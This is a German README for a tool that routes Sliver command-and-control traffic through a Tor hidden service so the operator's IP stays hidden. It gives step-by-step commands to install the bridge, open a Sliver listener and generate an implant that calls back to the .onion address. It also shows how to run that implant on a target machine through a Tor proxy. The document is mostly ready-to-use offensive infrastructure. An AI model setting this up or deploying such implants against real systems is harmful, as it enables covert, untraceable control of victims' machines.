
Tor-Transportbrücke für Sliver C2 - anonyme Befehls- und Kontrollinstanz
Tor-basierte Transportbrücke für Sliver C2. Erstellt einen Hidden Service und leitet den Datenverkehr an Ihren Sliver-Server weiter, sodass Ihre echte IP nie offengelegt wird.
Richtet einen Tor-Hidden-Service ein, der auf einen lokalen HTTP-Proxy zeigt. Der Proxy leitet alles an den HTTPS-Listener von Sliver weiter. Implants verbinden sich über Tor, Sie steuern sie normal über Sliver.
sliver server <---> proxy <---> tor hidden service <---> implant
:8443 :8080 xyz.onion (via tor)
git clone https://github.com/Otsmane-Ahmed/sliver-tor-bridge.git
cd sliver-tor-bridge
python3 -m venv venv
source venv/bin/activate
pip install -e .
Starten Sie Sliver mit einem HTTPS-Listener:
sliver-client
sliver > https -L 127.0.0.1 -l 8443
Starten Sie in einem anderen Terminal die Brücke:
sudo systemctl stop tor
sliver-tor-bridge start --sliver-port 8443
Die Ausgabe zeigt etwa Folgendes:
[+] Tor started successfully!
[+] Hidden Service: http://abc123xyz.onion
[+] Bridge is READY!
Warten Sie auf die .onion-Adresse und generieren Sie dann ein Implant:
sliver > generate --http http://abc123xyz.onion --os linux --save /tmp/implant
Führen Sie das Implant auf dem Ziel aus (benötigt Tor):
HTTP_PROXY=socks5h://127.0.0.1:9050 ./implant
sliver-tor-bridge start [OPTIONS]
--sliver-port Sliver HTTPS-Port (Standard 8443)
--tor-port Tor-SOCKS-Port (Standard 9050)
--service-port Hidden-Service-Port (Standard 80)
-c, --config Pfad zur Konfigurationsdatei
Weitere Befehle:
sliver-tor-bridge status # Prüfen, ob der Hidden Service läuft
sliver-tor-bridge stop # Verzeichnis des Hidden Service bereinigen
graph LR
Implant[Implant] -->|Tor Network| HS["Hidden Service (.onion)"]
HS -->|TCP :8080| Proxy["Bridge Proxy"]
Proxy -->|HTTPS :8443| Sliver["Sliver Server"]
Die Brücke sitzt in der Mitte und leitet den Datenverkehr weiter. Sliver denkt, es handele sich um normale HTTPS-Verbindungen. Das Implant denkt, es spreche mit einem normalen HTTP-Server.
docker-compose up -d
docker-compose logs -f
pip install pytest
pytest tests/
sliver_tor_bridge/
cli.py # Befehlszeilenschnittstelle
tor_manager.py # Startet Tor und erstellt Hidden Service
proxy.py # Flask-App, die an Sliver weiterleitet
config.py # Konfigurationshandhabung
Tor startet nicht: Stellen Sie sicher, dass der System-Tor beendet ist (sudo systemctl stop tor)
Zeitüberschreitung bei Verbindung: Das Tor-Bootstrap kann 1–3 Minuten dauern, warten Sie auf 100%
Implant verbindet sich nicht: Stellen Sie sicher, dass das Implant Zugriff auf Tor hat (SOCKS-Proxy auf Port 9050)
MIT